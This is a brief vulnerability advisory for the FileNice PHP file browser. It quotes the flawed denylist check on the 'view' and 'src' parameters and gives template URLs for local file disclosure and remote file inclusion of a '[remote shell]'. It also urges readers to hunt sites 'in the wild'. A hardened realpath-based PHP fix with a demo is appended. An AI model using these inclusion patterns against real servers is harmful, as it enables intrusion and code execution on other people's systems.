FileNice file browser RFI&LFI

By: e.wiZz!

#######Script site: http://filenice.com

In the wild...

###################################

######Vulnerability:

index.php

...

if(isset($_GET['view'])){
    // denylist on the raw string: rejects a leading "..", a leading "/", exactly "./", or any "../"
    if(substr($_GET['view'],0,2) != ".." && substr($_GET['view'],0,1) != "/" && $_GET['view'] != "./" && !stristr($_GET['view'], '../')){
        $out = new FNOutput;
        $out->viewFile($_GET['view']);
    }else{
        // someone is poking around where they shouldn't be
        echo("Don't hack my shit yo.");
        exit;
    }
}else if(isset($_GET['src'])){
    // same denylist; nothing here rejects a URL or stream wrapper
    if(substr($_GET['src'],0,2) != ".." && substr($_GET['src'],0,1) != "/" && $_GET['src'] != "./" && !stristr($_GET['src'], '../')){
        $out = new FNOutput;
        $out->showSource($_GET['src']);
    }else{
        // someone is poking around where they shouldn't be
        echo("Don't hack my shit yo.");
        exit;
    }

...

The check above attempts to block directory traversal (it can be bypassed), but there is no check at all for remote file inclusion, and you can also view the source of any file in the parent directory:

http://inthewild/path/index.php?src=[lfi] // index.php or whatever
http://inthewild/path/index.php?src=[remote shell]

btw. there are a lot of other vulnerabilities... happy huntin' :)
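For comparison, here is what a hardened counterpart to the `src`/`view` check above looks like. This is an added example, not FileNice's code; the function name fn_resolve_local_file(), its parameters and the temporary demo tree are assumptions made for the illustration. Instead of a denylist on the raw query string, it refuses anything that carries a URL scheme or stream wrapper (the remote-inclusion case the advisory points out), resolves the request with realpath() and keeps only paths that land inside one fixed base directory (the traversal case).

```php
<?php
// Added example, not FileNice's code. fn_resolve_local_file() and its
// parameters are assumptions made for this illustration.
//
// The advisory's check is a denylist on the raw query string. This version
// instead (1) refuses anything carrying a URL scheme or stream wrapper, which
// is the remote-inclusion case, and (2) resolves the request with realpath()
// and keeps only paths that land inside one fixed base directory.

/**
 * Return the canonical path of $requested inside $baseDir, or null when the
 * request names a URL/stream wrapper, escapes $baseDir, or is not a regular file.
 */
function fn_resolve_local_file(string $baseDir, string $requested): ?string
{
    // A scheme prefix ("http:", "ftp:", "php:", "data:", ...) means a stream
    // wrapper, never a plain file under the web root. Reject before any I/O.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $requested)) {
        return null;
    }
    // PHP 8 filesystem functions throw on embedded NUL bytes; reject explicitly.
    if (strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory itself does not exist
    }
    // realpath() collapses "." / ".." segments and symlinks, so the containment
    // check below runs on the canonical path rather than on the user's string.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null; // resolved outside the base directory
    }
    return $full;
}

// Constructed demo tree: <tmp>/files is the only directory we intend to serve.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'fn_demo_' . bin2hex(random_bytes(4));
mkdir($tmp . '/files/sub', 0700, true);
file_put_contents($tmp . '/files/readme.txt', "hello\n");
file_put_contents($tmp . '/secret.txt', "outside the served directory\n");

$cases = [
    'readme.txt',                // inside base: accepted
    'sub/../readme.txt',         // normalises to the same file: accepted
    '../secret.txt',             // parent directory: rejected
    'http://example.invalid/x',  // remote URL: rejected before touching disk
    "readme.txt\0.jpg",          // embedded NUL: rejected
    'sub',                       // a directory, not a file: rejected
];
foreach ($cases as $c) {
    $r = fn_resolve_local_file($tmp . '/files', $c);
    printf("%-28s => %s\n", str_replace("\0", '\0', $c), $r === null ? 'REJECT' : 'OK ' . basename($r));
}

// Clean up the constructed tree.
unlink($tmp . '/files/readme.txt');
unlink($tmp . '/secret.txt');
rmdir($tmp . '/files/sub');
rmdir($tmp . '/files');
rmdir($tmp);
```

In a dispatcher like the one quoted above the call would be `$path = fn_resolve_local_file(__DIR__, $_GET['src'])`, answering with a 404 whenever it returns null. The check is POSIX-oriented: the scheme regex would also refuse a Windows drive letter such as `C:`, and the containment test assumes `realpath()` returns absolute paths with a single separator style, which it does on Linux and macOS.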